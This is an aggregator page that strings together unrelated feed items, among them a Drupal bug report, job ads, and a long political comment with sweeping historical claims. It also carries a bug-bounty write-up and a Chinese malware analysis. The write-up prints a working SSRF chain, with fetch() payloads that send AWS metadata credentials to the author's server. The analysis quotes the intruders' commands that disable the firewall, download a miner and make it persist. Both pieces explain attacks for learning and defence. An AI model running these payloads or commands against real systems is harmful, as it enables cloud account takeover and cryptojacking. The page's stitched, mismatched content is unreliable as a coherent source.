Next Page: 10000

          webform_schedule_email.install      Cache   Translate Page      

Problem/Motivation

After updating webform, I was trying to run drush updb and got several errors regarding webform_scheduled_email.install:

•	Warning: include_once(C:\Apache24\html\web\modules\contrib\webform\modules\webform_scheduled_emailincludes/webform.install.inc): failed to open stream: No such file or directory in include_once() (line 12 of modules\contrib\webform\modules\webform_scheduled_email\webform_scheduled_email.install). 
•	include_once() (Line: 12)
•	require_once('C:\Apache24\html\web\modules\contrib\webform\modules\webform_scheduled_email\webform_scheduled_email.install') (Line: 136)
•	module_load_include('install', 'webform_scheduled_email') (Line: 93)
•	module_load_install('webform_scheduled_email') (Line: 82)
•	drupal_load_updates() (Line: 146)
•	Drupal\system\Controller\DbUpdateController->handle('selection', Object)
•	call_user_func_array(Array, Array) (Line: 112)
•	Drupal\Core\Update\UpdateKernel->handleRaw(Object) (Line: 73)
•	Drupal\Core\Update\UpdateKernel->handle(Object) (Line: 28)
•	Warning: include_once(): Failed opening 'C:\Apache24\html\web\modules\contrib\webform\modules\webform_scheduled_emailincludes/webform.install.inc' for inclusion (include_path='.;C:\php\pear') in include_once() (line 12 of modules\contrib\webform\modules\webform_scheduled_email\webform_scheduled_email.install). 

The problem seems to be this, at lines 11/12:

$WEBFORM_ROOT = str_replace('/modules/webform_scheduled_email', '/', __DIR__);
include_once $WEBFORM_ROOT . 'includes/webform.install.inc';

it is not traversing back up the path to the actual webform root.

Proposed resolution

Replacing line 12 with the following works, but I'm not sure of the preferred way to make the correction:

include_once __DIR__ . '/../../includes/webform.install.inc';


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Caddy: Conoce este servidor web HTTP/2 con HTTPS habilitado por defecto      Cache   Translate Page      

En RedesZone hemos hablado en varias ocasiones de diferentes servidores web, como por ejemplo Apache, Nginx e incluso otros menos conocidos como Lighttpd. Hoy os vamos a dar a conocer Caddy, un servidor web multiplataforma y con una puesta en marcha muy sencilla. ¿Quieres conocer las principales características de este nuevo servidor web Caddy? Principales

El artículo Caddy: Conoce este servidor web HTTP/2 con HTTPS habilitado por defecto se publicó en RedesZone.


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Для Linux представлена система динамической отладки BPFtrace (DTrace 2.0)      Cache   Translate Page      
Брендан Грег (Brendan Gregg), один из разработчиков DTrace, объявил об открытии доступа к репозиторию проекта BPFtrace, в рамках которого развивается высокоуровневый язык для написания скриптов динамической отладки и анализа производительности приложений и ядра, продолжающий развитие системы DTrace (позиционируется как DTrace 2.0). Наработки проекта распространяются под лицензией Apache 2.0.
          AWS takeover through SSRF in JavaScript      Cache   Translate Page      

Here is the story of a bug I found in a private bug bounty program on Hackerone. It toke me exactly 12h30 -no break- to find it, exploit and report. I was able to dump the AWS credentials, this lead me to fully compromise the account of the company: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it’s one of my best bug in my hunter career, I also learnt alot during this sprint, so let’s share!

Intro

As I said, the program is private so the company, let’s call it: ArticMonkey.
For the purpose of their activity -and their web application- ArticMonkey has developed a custom macro language, let’s call it: Banan++. I don’t know what language was initially used for the creation of Banan++ but from the webapp you can get a JavaScript version, let’s dig in!

The original banan++.js file was minified, but still huge, 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn’t read the whole sh… By searching some keywords very specific to Banan++, I located the first function in line 3348. About 135 functions were available at that time. This was my playground.

Spot the issue

I started to read the code by the top but most of the functions were about date manipulation or mathematical operations, nothing really insteresting or dangerous. After a while, I finally found one called Union() that looked promising, below the code:

helper.prototype.Union = function() {
   for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22];
   var value = args.shift(),
    symbol = args.shift(),
    results = args.filter(function(arg) {
     try {
      return eval(value + symbol + arg)
     } catch (e) {
      return !1
     }
    });
   return !!results.length
  }

Did you notice that? Did you notice that kinky eval()? Looks sooooooooooo interesting! I copied the code on a local HTML file in order to perform more tests.

Basically the function can take from 0 to infinite arguments but start to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second, then the fourth is tested, the fifth etc… Normal usage should be something like Union(1,'<',3); and the returned value true if at least one of these tests is true or false.
However there is absolutely no sanitization performed or test regarding the type and the value of the arguments. With the help of my favourite debugger -alert()- I understood that an exploit could be triggered in many different ways:

Union( 'alert()//', '2', '3' );
Union( '1', '2;alert();', '3' );
Union( '1', '2', '3;alert()' );
...

Find an injection point

Ok so I had a vulnerable function, which is always good, but what I needed was a input to inject some malicious code. I remembered that I already seen some POST parameters using Banan++ functions so I performed a quick search in my Burp Suite history. Got it:

POST /REDACTED HTTP/1.1
Host: api.REDACTED.com
Connection: close
Content-Length: 232
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red
Content-Type: application/json;charset=UTF-8
Referer: https://app.REDACTED.com/REDACTED
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth=REDACTED

{...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 54
Connection: close
X-Content-Type-Options: nosniff
X-Xss-Protection: 1
Strict-Transport-Security: max-age=15768000; includeSubDomains
...REDACTED...

[{"name":"REDACTED",...REDACTED...}]

The parameter operation seems to be a good option. Time for testing!

Perform the injection

Since I didn’t know anything about Banan++, I had to perform some tests in order to find out what kind of code I could inject or not. Sort of manual fuzzing.

{...REDACTED...,"operation":"'\"><"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":null}
[]
{...REDACTED...,"operation":"0"}
[]
{...REDACTED...,"operation":"1"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"a"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"a=1"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert()"}
{"status":400,"message":"Function 'alert' is not defined"}
{...REDACTED...,"operation":"Union()"}
[]

What I conclued here was:

  • I cannot inject whatever JavaScript I want
  • I can inject Banan++ functions
  • the response seems to act like a true/false flag depending if the interpretation of parameter operation is true or false (which was very useful because it helped to validate the code I injected)

Let’s continue with Union():

{...REDACTED...,"operation":"Union(1,2,3)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union(a,b,c)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a','b','c')"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a';'b';'c')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'2';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'<';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'>';'3')"}
[]]

Perfect! If 1 < 3 then the response contains valid datas (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semi colon. I could now try a real attack.

fetch is the new XMLHttpRequest

Because the request is an ajax call to the api that only returns JSON datas, it’s obviously not a client side injection. I also knew from a previous report that ArticMonkey tends to use alot JavaScript server side.

But it doesn’t matter, I had to try everything, maybe I could trigger an error that would reveal informations about the system the JavaScript runs on. Since my local testing, I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript but all I got was the error previously mentionned.

I then tried to fire an HTTP request.

Through ajax call first:

x = new XMLHttpRequest;
x.open( 'GET','https://poc.myserver.com' );
x.send();

But didn’t receive anything. I tried HTML injection:

i = document.createElement( 'img' );
i.src = '<img src="https://poc.myserver.com/xxx.png">';
document.body.appendChild( i );

But didn’t receive anything! More tries:

document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">';
document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

But didn’t receive anything!!!

Sometimes you know, you have to test stupid things by yourself to understand how stupid it was… Obviously it was a mistake to try to render HTML code, but hey! I’m just a hacker… Back to the ajax request, I stay stuck there for a while. It toke me quite a long time to figure out how to make it work.

I finally remembered that ArticMonkey uses ReactJS on their frontend, I would later learnt that they use NodeJS server side. Anyway, I checked on Google how to perform an ajax request with it and found the solution in the official documention which lead me to the fetch() function which is the new standard to perform ajax call, that was the key.

I injected the following:

fetch('https://poc.myserver.com')

And immediately got a new line in my Apache log.

Being able to ping my server is a thing but it’s a blind SSRF, I had no response echoed back. I had the idea to chain two requests where the second would send the result of the first one. Something like:

x1 = new XMLHttpRequest;
x1.open( 'GET','https://...', false );
x1.send();
r = x1.responseText;

x2 = new XMLHttpRequest;
x2.open( 'GET','https://poc.myserver.com/?r='+r, false );
x2.send();

Again it toke me while to get the correct syntax with fetch(). Thanks StackOverflow.

I ended with the following code which works pretty well:

fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

Of course, Origin policy applies.

SSRF for the win

I firstly tried to read local files:

fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

But the response (r parameter) in my Apache log file was empty.

Since I found some S3 buckets related to ArticMonkey (articmonkey-xxx), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses x-cache: Hit from cloudfront). I quickly jump on the list of the most common SSRF URL for Cloud Instances.

And got a nice hit when I tried to access the metadatas of the instance. aws takeover through ssrf in javascript

Final payload:

{...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

Decoded output is the directory listing returned:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
...

Since I didn’t know anything about AWS metadatas, because it was my first time in da place. I toke time to explore the directories and all files at my disposition. As you will read everywhere, the most insteresting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>. Which returned:

{
  "Code":"Success",
  "Type":"AWS-HMAC",
  "AccessKeyId":"...REDACTED...",
  "SecretAccessKey":"...REDACTED...",
  "Token":"...REDACTED...",
  "Expiration":"2018-09-06T19:24:38Z",
  "LastUpdated":"2018-09-06T19:09:38Z"
}

Exploit the credentials

At that time, I though that the game was ended. But for my PoC I wanted to show the criticity of this leak, I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that they are temporary credentials, only valid for a short period, 5mn more or less. Anyway, 5mn is supposed to be enough to update my own credentials to those ones, 2 copy/paste, I think I can handle that… err…

I asked for help on Twitter from SSRF and AWS master. Thank guys, I truely appreciate your commitment, but I finally found the solution in the UserGuide of AWS Identity and Access Management. My mistake, except to not read the documentation (…), was to only use AccessKeyId and SecretAccessKey, this doesn’t work, the token must also be exported. Kiddies…

$ export AWS_ACCESS_KEY_ID=AKIAI44...
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI...
$ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

Checking my idendity with the following command proved that I was not myself anymore.

aws sts get-caller-identity

And then…
aws takeover through ssrf in javascript

Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part -or the whole- of their system.

Right: the company owns 20 buckets, containing highly sensitive datas from customers, static files for the web application, and according to the name of the buckets, probably logs/backups of their server.

Impact: lethal.

Timeline

06/09/2018 12h00 - beginning of the hunt
07/09/2018 00h30 - report
07/09/2018 19h30 - fix and reward

Thanks to ArticMonkey for being so fast to fix and reward, and agreed this article :)

Conclusion

I learnt alot because of this bug:

  • ReactJS, fetch(), AWS metadatas.
  • RTFM! The official documentation is always a great source of (useful) informations.
  • At each step new problems appeared. I had to search everywhere, try many different things, I had to push my limits to not give up.
  • I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and statisfaction :)

When someone tells you that you’ll never be able to do something, don’t waste your time to bargain with these peoples, simply prove them they’re wong by doing it.


          事件分析 | 门罗币挖矿新家族「罗生门」      Cache   Translate Page      

一、前言

腾讯安全云鼎实验室通过部署的威胁感知系统捕获了一批挖矿样本(具有同源性),是一批可挖取门罗币(xmr)的挖矿病毒。这批样本今年5月开始出现,目前各大杀软对此样本基本无法有效查杀,腾讯云云镜第一时间跟进查杀。根据进一步溯源的信息可以推测该挖矿团伙利用被入侵的博彩网站服务器进行病毒传播。

分析显示,此挖矿样本不具有传播性,总体结构式是 Loader + 挖矿子体,挖矿团伙通过控制的机器进行远程 SSH 暴力破解并将病毒进行传播。由于目前能对付此病毒的杀软极少,且该病毒通过入侵的赌博网站服务器进行病毒传播、挖矿,让真相扑朔迷离,云鼎实验室威胁情报小组将本次门罗币挖矿新家族命名为「罗生门」。

二、入侵分析

挖矿样本通过母体释放挖矿子体,母体是 Loader ,释放挖矿子体,执行挖矿子体。母体本身不包含 SSH 爆破等蠕虫动作,子体就是单纯的挖矿代码(加壳变形 UPX)。通过观测发现,进行 SSH 爆破的主机 IP 较少且固定,可以认定为固定机器,使用工具进行扫描、爆破。通过这种广撒网的方式,犯罪团伙能收获不少门罗币。

攻击流程图:

门罗币挖矿新家族「罗生门」

攻击过程示意:

门罗币挖矿新家族「罗生门」

攻击日志来源:http://bikewiki.jp:5000/app/2018/07/27/073148-4879.log

母体 Loader 详细分析:

母体 Loader 的行为包含自启动和释放运行文件两个部分。

门罗币挖矿新家族「罗生门」

自启动代码:

在函数 main_Boot 中通过 sed 编辑 rc.local 和 boot.local 来进行自启动。

释放文件:

门罗币挖矿新家族「罗生门」

执行文件:

门罗币挖矿新家族「罗生门」

三、病毒子体分析

通过对挖矿样本进行分析发现,子体是一个加壳后的标准矿机程序,子体加壳也是导致杀软无法查杀的一个方式。子体加壳为 UPX 变形壳,可以抵抗通用脱壳机的脱壳。手动脱壳后发现为标准挖矿程序(开源矿机程序)。

相关开源项目连接为:https://github.com/sumoprojects/cryptonote-sumokoin-pool

门罗币挖矿新家族「罗生门」

四、矿池分析与统计

据观测今年5月至9月初,蜜罐捕获的「罗生门」挖矿病毒累计挖出约12.16个门罗币,价值约1w人民币(2018年10月8日,门罗币价格为114.2USD,合计1388.67美金),算力为8557H/S,大约是皮皮虾矿池的百分之一算力。从算力上看,这种广撒网式的传播,也能有一定的规模。

挖矿样本执行挖矿的命令如下:

-B -ostratum+tcp://mine.ppxxmr.com:7777-u 41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCM'Qf1FwzqEi-px -k --max-cpu-usage=75

从挖矿命令中可知,挖矿样本对 CPU 利用率有一定的限制,最大 CPU 使用量为75%。

挖矿样本针对的矿池地址和门罗币(xmr)产量如下:

门罗币挖矿新家族「罗生门」

对应的钱包地址为:

钱包地址:

45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT

45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT

45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx

45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx

41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi

45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT

45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT

47xB4pdBngkhgTD1MdF9sidCa6QRXb4gv6qcGkV1TT4XD6LfZPo12CxeX8LCrqpVZm2eN3uAZ1zMQCcPnhWbLoPgNbK8y3Z

41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi

五、免杀分析

1、检测效果:

将挖矿样本在 VirusTotal 中检测发现,除了 Drweb 可以检出此样本,其余杀软均无法有效检测此样本。挖矿病毒5月出现,流行3月有余,VirusTotal 上依然只有1款杀软可以查杀。

下图是挖矿样本在 VirusTotal 中的检测结果:

门罗币挖矿新家族「罗生门」

2、免杀流程:

基本所有杀软都无法查杀此病毒,此病毒通过 Go 语言 Loader 和子体加变形 UPX 壳进行免杀,对于 Linux 查杀较为薄弱的杀软,很容易漏报。

免杀示意图:

门罗币挖矿新家族「罗生门」

Loader 使用 Go 语言编写,大量的 Go 语言的库代码掩盖了真正的病毒代码部分,所以免杀效果较好。2155个 Go 语言库函数,真正的病毒代码包含在4个函数中。

门罗币挖矿新家族「罗生门」

六、溯源分析

对这批挖矿样本进行溯源分析发现,从今年5月开始,发起攻击的 IP一共有两个:160.124.67.66123.249.34.103

另外,样本下载地址:181.215.242.240123.249.9.141 123.249.34.10358.221.72.157160.124.48.150

SSH 暴力破解成功后执行的命令有(suSEfirewall的关闭、iptables 的关闭、样本的下载):

/etc/init.d/iptables stop;

service iptables stop;

SuSEfirewall2 stop;

reSuSEfirewall2 stop;cd/tmp;

wget -chttp://181.215.242.240/armtyu;

chmod 777 armtyu;./armtyu;

echo “cd/tmp/”>>/etc/rc.local;

echo”./armtyu&”>>/etc/rc.local;echo “/etc/init.d/iptablesstop

IP 地址 服务器地址 对外开放服务 其他描述
181.215.242.240 美国 netbios ftp、垃圾邮件、僵尸网络
160.124.67.66 中国 香港 netbios mmhongcan168.com、28zuche.com、014o.com、ip28.net、扫描
160.124.48.150 中国 香港 netbios ip28.net、扫描
123.249.9.141 中国 贵州 僵尸网络

扫描 IP 和下载 IP  信息表)

表格中 160.124.67.66 是扫描 IP,通过对 IP 信息的图谱聚类,发现香港的两台主机均为一个团伙控制的机器。美国和贵州的机器是入侵得到的机器。

12.png

(团伙图聚类)

上面提到的扫描机器均为赌博网站的机器,曾经的域名mmhongcan168、28zuche 等都是赌博网站。

28zuche

门罗币挖矿新家族「罗生门」门罗币挖矿新家族「罗生门」

另一台香港机器的域名为 himitate.com,也是赌博网站。

门罗币挖矿新家族「罗生门」

两台香港主机均为 ip28.net,都可以作为门罗币(xmr)的挖矿代理主机。

黑产江湖之黑吃黑:

有人的地方就有江湖,黑产作为互联网中的法外之地,弱肉强食也是这个不法之地的规则。有做大产业的黑产大佬,也有干一票就走的小团伙,黑吃黑几乎天天都在上演。

赌博网站和色情网站是黑吃黑中常常被吃的对象,经研究分析可知,众多赌博网站所在的服务器竟被用来做扫描,各赌博网站之间并没发现强关联性,做赌博的团伙同时做挖矿的跨界运营也不是很多,而且整个挖矿金额不高。挖矿团伙若是入侵了赌博网站,利用其作为病毒服务器传播挖矿病毒,这也不是不可能。

对于美国和贵州的两台下载机,根据 threatbook 的情报,这两台主机应该是肉鸡,如下图:

门罗币挖矿新家族「罗生门」

第二个扫描地址为:123.249.34.103 

58.221.72.157 江苏 rat
123.249.34.103 贵州 scan
mdb7.cn 美国 bot

地理位置:

扫描地址 123.249.34.103的实际地址为中国贵州黔西南布依族苗族自治州,相关的情报如下:

门罗币挖矿新家族「罗生门」

相关网站解析过的地址为:

f6ae.com

www.f6ae.com

www.h88049.com

www.h88034.com

h88032.com

www.h88032.com

h88034.com

h88049.com

h5770.com

h88051.com

以上 URL 地址均为赌博网站:

门罗币挖矿新家族「罗生门」

其他的一些情报

云鼎实验室威胁情报团队在网络上也观测到这些 IP 的扫描行为,很多日志都有记录。可以发现这个挖矿样本的扫描传播是一种无针对的、广撒网式的暴力破解传播模式。

日志地址1:

ftp://egkw.com/Program%20Files/Apache%20Software%20Foundation/Tomcat%207.0/logs/localhost_access_log.2018-04-28.txt

19.png

日志地址2:

http://217.31.192.50/data/proki2018-05-13.txt

20.png

七、总结

通过观测发现扫描主机均属于赌博网站,赌博等黑产现在开始向挖矿业务进军了吗?。

防御方法:

(1)修改 SSH 口令,要定期更换 SSH 口令,并保证一定的复杂度。

(2)安装腾讯云云镜,提前发现可疑木马及暴力破解行为。

(3)对于外部SSH 连接的 IP 进行黑白名单限制。

相关样本 hash:

48f82a24cf1e99c65100c2761f65265c

723bd57431aa759d68cecb83fc8a7df8

a357b1b00e62cab7dc8953522f956009

470e7cdac0360ac93250f70a892a8d03

788eaec718569c69b21ff3daef723a8f

bf34509ae03b6f874f6f0bf332251470

580cb306c4e4b25723696cb0a3873db4

826f3e5ee3addfbf6feadfe5deadbe5e

dd68a5a3bf9fbb099c9c29e73dbab782

相关中间文件 sha256:

8797e998c01d2d6bb119beb2bbae3c2f84b6ae70c55edd108ed0e340972cf642

f8e1957e8bfd7f281a76d1e42694049c67f39dea90ac36e9d589c14cdf8924bc

f54b1e99039037f424e7e2ada7ae0740b6d1da229688a81e95fd6159f16fbbc1

ca60d04204aa3195e8cd72887c7deced1a7c664e538256f138b5698d381ceb00

e8b70f11c412a75ccfb48771029679db72c27bd61c41c72e65be5464415df95f

08fd38e2891942dadd936d71b7e98055ba48c58bc986d5c58f961055bcc378fc

08a31726ae65f630ce83b9a0a44108ff591809b14db5b7c0d0be2d0829211af5

1ac7ba4ba4b4a8c57b16cf4fac6ea29e41c0361c3260bf527278525b4bec5601

396a2174d2f09e8571e0f513a8082ccdd824e988b83393217274e64fe0dafd69

b238c09c3fdbda62df39039ed49d60d42d32312eedadfc2c6ced4d65d27b1ddb

99802523c466ea9273de893be5c12c7c654dfd4deb5a896b55718e69b721e548

786f4d124ef75e9f45d650fbd859d591a03ca71e2625f50d3078503f76edfd34

1dfb2cd3c94c624691534446ece255c49ed3ba02f45128c19e5a853dcf6f6ab8

472ba9ddbef409975284e4428071d5b8eb576f2b27ad19ca2fad7094aeebd281

1fa25061004ea01311b2d27feda124b4262b5611f91882c2d9895f0a53016051

58ad0006fe9fd093c7af6f0065a93209f21074d6694f0351f25ece1b78b7a978

fbb1396e37adcab88a0e21f9e0366c8da9a199652906fa194caccef8f70844c3

f8ccdcc45c6cbd4cc1c8f56a320106cfc9c42ad94b499d5ca6ec280b1077bf41

ffb9568a7b5da78389d20daba65e2e693e8c9828c874ad8771dcd5bb5c8a1e57

f5aed11216ee356a4896ad22f375e2b62b7ca22e83737f24ec0e5cdaa400b051

*本文作者 murphyzhang腾讯安全云鼎实验室),转载请注明来自 FreeBuf.COM。


          Comment on “I’m Just Glad We Ruined Brett Kavanaugh’s Life”: Colbert Writer Tweets Out A Celebration Of The Politics Of Personal Destruction by Karen S      Cache   Translate Page      
David: There is no inherent nobiltiy in indigenous people, gender, race, or ethnicity. There are differences in culture and society, but human nature is the same everywhere. Tribes were not pacifists handing out flowers. Every tribe was different. They warred with each other over resources. Many kept slaves, especially sex slaves of female captives. Some tribes revered bravery in the face of pain. What they did to prisoners makes the worst Chainsaw Massacre movie look tame. Some kept scalps to prove their bravery. There were stories of cannibalism. Native Americans used technology and other assets they got from Europeans to wage war on each other. The horse came from the Conquistadors. Mounted tribes promptly overwhelmed those without the horse. Guns were used against each other once they got them from Europeans. The Apache rode their horses into the ground, ate them, and then just stole another one. The Nez Pearce were famous horsemen, by comparison. The Iriquois Nation terrorized surrounding tribes. Archeologists unearthed towers made up of hundreds of thousands of human bones, and they confirmed that Aztecs did indeed tear the beating hearts from the chest of their sacrifices, including many children. Wtihout the Conquistadors, the Aztecs would be stilll merrily terrorizing the entire region, slaughtering millions of people. Indigenous people were also not "First Nation." That was the Neanderthals, which were discovered to have existed in North America. They were wiped out in their contact with Cro Magnon. The Clovis Indians were Second Nation. They were displaced by immigrants from Asia, who are Third Nation indigenous people. Later colonizers were Fourth Nation. Those values will probably be reshuffled over and over again the more we learn about ancient migrations and displacement. The Fourth Nation people adopted the conquered Third Nation into their tribe, but many live separately in reservations. They are administered many socialis programs, are not allowed to own tribal land, and are treated like children by the government. Consequently, they live in abject poverty with terrible education. By contrast, the tribes who do not live under the Bureau of Indian Affairs, own land and have a high median income. That's without casino revenue. In addition, why does the government help the Sioux hold the Black Hills? They took it from the Cheyanne, who also took it from other tribes. The land changed hands multiple times that we know of. Why do the Sioux claim ownership? Native tribes did not believe in deeded land ownership that can be passed down in perpetuity. Tribes held land until and unless they lost it to a stronger tribe. The explanation for why the Sioux took the Black Hills from other tribes was that it was strong. The Fourth Nation is just a strong tribe that overpowered all others, and introduced them to the wheel. I do not condone any of the savegery that both sides did to each other. It was grievous. I also do not subscribe to the attitude that Native Americans were peace loving pacifists who cared for the land. They were fierce fighers, and if they needed to make a fire, they burned wood. Greenhouse gas producing wood burning. In fact, they would put land to the flame to create more open hunting ground. This was not a holier than thou war, but one of a fight for survival and resources. I believe that Reservations should be done away with, and the land divided up among members of the tribe to do with as each individual wishes. Just being allowed to own their land would be a huge step forward in improving thier circumstances. It is unacceptable that tribes STILL live in poverty in these failed Progressive plantations of Reservations. Immigrants come here with the equivalent of 50 cents in their pocketes, and live far better than the Res within a year. If Colombus had not arrived, then the Aztecs would have murdered millions more people. If there was no United States, there would have not been the key Ally that helped defeat Hitler. Without the US, all of Europe would be Nazis and the Jews might have been wiped out. Without the US, there would not be our trillions of dollars spent on global environmental, humanitarian, and military aid. We float the budget for the UN and various environmental initiatives. I also do not believe for one instant that if Spain had not colonized America, that the rest of the world would have ignored our enormous, resource rich continent and genteely starved to death in their overcrowded countries, where class was an insurmountable barrier. People didn't have the land to grow a head of cabbage for themselves. But people with superior mlitary might were going to leave open, unworked, fertile land to those who didn't have the wheel, or steel, and were still using bows and arrows? No way. No. Way. A superior tribe would have taken the land from the less advanced tribe, just as the Native Americans had been doing to each other for thousands of years. Perhaps even the Aztecs would have expanded, and we'd have our own mountains of bones.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          The Importance of the BritAsia TV Music Awards      Cache   Translate Page      

The BritAsia TV Music Awards 2018 was held on Saturday 6th October at Park Plaza Westminster Bridge, London.

We caught up with G. Sidhu, Seema Jaswal, Steel Banglez, DJ Frenzy, Sunny & Shay, Apache Indian, Jernade Miah, JK, Naughty Boy, Noreen Khan and Raghav as they explained to us why the BritAsia TV Music Awards are important to the industry.

#BAMA18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Visit britasia.tv for news & updates
Subscribe: https://www.youtube.com/britasiatv
Like on Facebook: https://www.facebook.com/BritAsiaTV
Follow on Twitter: https://twitter.com/BritAsiaTV
Follow on Instagram: https://www.instagram.com/britasia_tv

Author: avatarBritAsiaTV
Tags: music awards steel banglez grime uk music punjabi bhangra bollywood naughty boy britasia tv
Posted: 08 Oktober 2018


          Real-Time Data Replication Between Ignite Clusters Through Kafka      Cache   Translate Page      

Apache Ignite, from version 1.6 provides a new way to do data processing based on Kafka Connect. Kafka Connect, a new feature introduced in Apache Kafka 0.9, enables scalable and reliable streaming data between Apache Kafka and other data systems. It made it easy to add new systems to your scalable and secure stream data pipelines in-memory. In this article, we are going to look at how to set up and configure the Ignite Source connector to perform data replication between Ignite clusters.

Apache Ignite, out-of-the-box, provides the Ignite-Kafka module with three different solutions (API) to achieve a robust data processing pipeline for streaming data from/to Kafka topics into Apache Ignite.


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Developer, Integration - Alberta Motor Association - Edmonton, AB      Cache   Translate Page      
You have extensive experience working with both SOAP and RESTful web APIs. Having experience with Apache Kafka, Apache Spark, ElasticSearch, API Manager and ESB...
From Alberta Motor Association - Wed, 01 Aug 2018 20:58:26 GMT - View all Edmonton, AB jobs
          文章: Uber开源Marmaray:基于Hadoop的通用数据摄取和分散框架      Cache   Translate Page      

